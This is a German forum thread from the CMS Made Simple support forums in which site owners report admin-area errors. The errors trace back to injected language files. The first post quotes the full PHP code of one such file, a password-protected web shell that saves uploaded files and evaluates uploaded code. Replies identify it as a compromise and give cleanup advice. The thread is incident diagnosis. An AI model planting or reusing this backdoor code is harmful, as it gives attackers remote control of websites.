CMS Made Simple Forums

Moin, habe seit heute folgende Meldungen im admin-bereich:

c1608e58b7a40647381b4667630bf061

Notice:  Undefined index:  p in /WWWROOT/73794/htdocs/cmsms/admin/lang/func__af_ZA.nls.php on line 18
82d58bfc8dc7a2fa985939b01d5b694f
69175bee376c12eba6ddbd1f632a7f10


Warning: Cannot modify header information - headers already sent by (output started at /WWWROOT/73794/htdocs/cmsms/admin/lang/func__af_ZA.nls.php:16) in /WWWROOT/73794/htdocs/cmsms/admin/login.php on line 185

Warning: Cannot modify header information - headers already sent by (output started at /WWWROOT/73794/htdocs/cmsms/admin/lang/func__af_ZA.nls.php:16) in /WWWROOT/73794/htdocs/cmsms/admin/login.php on line 186


In Zeile 18 der func_af_ZA.nls.php steht: (ist nicht mehr die Originaldatei, hab die Leerzeilen gelöscht)

(16) echo "";
(17) testdata('start');
(18) if (md5($_POST["p"]) == PASSWD) {
  if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
    $HTTP_POST_FILES["s"]["size"])) {
      if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
      {
      testdata('save_ok');
      };
      //eval($code);
  } else {
    testdata('save_fail');
  };
 
  if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
    $HTTP_POST_FILES["f"]["size"]))
  {
      eval($code);
      testdata('ok');
  } else {
    testdata('fail');
  };
 
} else {
  testdata('pass');
};

testdata('end');
echo "";
?> 

Es scheint alles zu funktionieren, aber es nervt...
Bin für jeden Tipp dankbar.

Ähmm, würde sagen, da läuft gerade etwas ganz schief.

bunzi wrote: Notice:  Undefined index:  p in /WWWROOT/73794/htdocs/cmsms/admin/lang/func__af_ZA.nls.php on line 18

Es gibt in admin/lang keine func__af_ZA.nls.php bzw. darf es nicht geben!!! Sieht für mich aus, als sollten Passwörter abgefangen werden (bin kein Programmierer).

Ich würde folgendes vorschlagen:

1. das admin-Verzeichnis KOMPLETT neu hochladen
2. In dem Verzeichnis admin/lang ALLES außer den Verzeichnissen /en_US und /ext sowie die Dateien index.html, en_US.nls.php löschen.
3. den Namen des admin-Verzeichnisses ändern (auch in der config.php)
4. die Berechtigungen des Verzeichnisses prüfen und ggf. korrigieren
5. sämtliche Passwörter ändern
6. den Security-Thread lesen und schnellstmöglich umsetzen

http://forum.cmsmadesimple.org/index.ph ... 664.0.html

Um ganz sicher zu gehen, kannst du auch alle CMSms-Dateien nochmals überspielen ...

cyberman wrote: Ähmm, würde sagen, da läuft gerade etwas ganz schief.

Es gibt in admin/lang keine func__af_ZA.nls.php bzw. darf es nicht geben!!! Sieht für mich aus, als sollten Passwörter abgefangen werden (bin kein Programmierer).

Da könntest du recht haben! Werde mich mit dem Code mal intensiver beschäftigen...
Danke für die anderen Tipps; habe erstmal die o.g. Funktion gelöscht und noch eine ähnliche direkt im Admin-Verzeichnis; jetzt sind die Fehler weg. Muss aber doch mal mehr für die Sicherheit tun... mal sehen, wie lange es so gut geht.

Ich habe das gleiche probleem. Habe den folgende Fehler im admin bereich.

c1608e58b7a40647381b4667630bf061

Notice:  Undefined index:  p in /home/c6027ect/domains/infowebs.nl/public_html/cmsms-demo/admin/lang/fx__sr_YU.nls.php on line 118
82d58bfc8dc7a2fa985939b01d5b694f
69175bee376c12eba6ddbd1f632a7f10

Es betrift die site cmsms-demo.infowebs.nl.

Habe schon verschucht den upgrade van 1.2.3 nach 1.2.5 durch zu fuhren aber dass war nich die Loschung.

Hilfe hilfe. Was is da loss. Mehre CMSMade simple melden dass gleiche Probleem oder sind da nur wir zwei



(verzeihung fur mein slechtes Deutch)

Musicscore

/home/c6027ect/domains/infowebs.nl/public_html/cmsms-demo/admin/lang/fx__sr_YU.nls.php on line 118

Diese Datei gehört nicht zu einer CMSMS Installation (v1.2.5).

(This file is not part of a CMSMS installation. (v1.2.5))

Da hat jemand eine Sicherheitslücke in deiner CMSMS Version ausgenutzt. Du solltest auf die aktuelle 1.2.5 updaten (und Dateien die nicht zu CMSMS gehören löschen)